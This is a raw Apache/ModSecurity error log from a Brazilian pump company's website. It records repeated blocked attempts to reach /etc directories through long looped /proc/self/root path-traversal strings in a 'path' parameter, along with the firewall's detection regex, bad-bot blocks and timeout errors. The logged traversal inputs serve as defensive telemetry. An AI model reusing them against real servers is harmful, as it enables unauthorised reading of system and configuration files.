https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:08:29.121858 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47710] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:08:50.132699 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47938] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:08:59.842788 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:50416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abozaymAPhZkrhU8w4kjsAAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:09:12.127049 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48174] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:09:16.248442 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:60166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abozfNY0UrI5A3LftIxEdwAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:09:34.121881 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48362] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:09:56.129839 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48606] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:10:18.117809 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48920] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:10:44.121997 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49176] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:10:56.154169 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.244.43:56444] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboz4Ow_le52K8_3pV2UzwAAAgg"]
[Wed Mar 18 02:11:06.102622 2026] [proxy_fcgi:error] [pid 11816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49444] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:11:29.405862 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49630] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:11:29.573095 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.228.61:54264] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo0Aew_le52K8_3pV2U1wAAAgQ"]
[Wed Mar 18 02:11:36.418451 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:33068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo0COoXxyEfFpUF8f8ipgAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 02:11:44.954775 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:33068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo0EOoXxyEfFpUF8f8irQAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:11:52.129960 2026] [proxy_fcgi:error] [pid 15051:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49898] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:12:14.137995 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50130] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:12:19.481620 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:46586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo0M9Y0UrI5A3LftIxEoAAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:12:36.122403 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50378] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:12:59.125809 2026] [proxy_fcgi:error] [pid 29882:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50604] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:13:21.141814 2026] [proxy_fcgi:error] [pid 15051:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50892] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:13:43.009905 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51178] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:13:47.037797 2026] [mime_magic:error] [pid 17653:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:27706] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 02:14:04.062627 2026] [proxy_fcgi:error] [pid 15051:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51468] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:14:26.119802 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51742] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:14:48.141793 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52016] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:14:53.030049 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:43796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo0zcdf6f5d65gmYZSFjAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:15:10.121950 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52286] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:15:32.498997 2026] [proxy_fcgi:error] [pid 29882:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52556] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:15:55.153126 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52876] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:15:57.726081 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.244.43:45376] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo1Dfu8EFLIOrSqIpu9HgAAAkY"]
[Wed Mar 18 02:16:16.128195 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53114] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:16:38.129900 2026] [proxy_fcgi:error] [pid 15051:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53306] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:16:38.769101 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.228.61:46188] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo1NuyqAr6etmhZHNps8gAAAFY"]
[Wed Mar 18 02:16:59.113124 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53636] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:17:21.064709 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53888] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:17:43.129786 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54152] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:18:06.089826 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54402] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:18:11.465793 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:42588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo1k8df6f5d65gmYZSGGAAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:18:28.069925 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54682] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:18:29.578432 2026] [core:alert] [pid 31803:tid 140411741927168] [client 74.7.243.128:54400] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware
[Wed Mar 18 02:18:43.869196 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:55278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo1symAPhZkrhU8w4kkPAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:18:50.117827 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54860] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:19:11.561784 2026] [mime_magic:error] [pid 26799:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:25496] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 02:19:11.561994 2026] [access_compat:error] [pid 26799:tid 140411607643904] [client 216.73.216.191:25496] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Wed Mar 18 02:19:12.125843 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55042] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:19:34.125795 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55308] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:19:57.123072 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55506] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:20:08.402753 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:55278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo2CCmAPhZkrhU8w4kkagAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:20:09.237256 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.241.31:56656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo2Cew_le52K8_3pV2VjAAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:20:18.130316 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55818] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:20:29.771094 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.241.31:46992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo2Hew_le52K8_3pV2VpwAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:20:41.133831 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56086] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:20:42.173186 2026] [mime_magic:error] [pid 11816:tid 140411741927168] (70014)End of file found: [client 74.7.243.128:50614] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt/puppetlabs/bin
[Wed Mar 18 02:20:58.135356 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.244.43:49892] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo2OeyqAr6etmhZHNptZQAAAE0"]
[Wed Mar 18 02:21:06.069842 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56406] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:21:07.826951 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:33306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo2Q-yqAr6etmhZHNptawAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:21:09.631756 2026] [mime_magic:error] [pid 17653:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:56910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware/amdgpu
[Wed Mar 18 02:21:11.815233 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:54772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo2RwkwaGbbGflqUZDJmgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:21:18.294174 2026] [mime_magic:error] [pid 31803:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:49014] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run
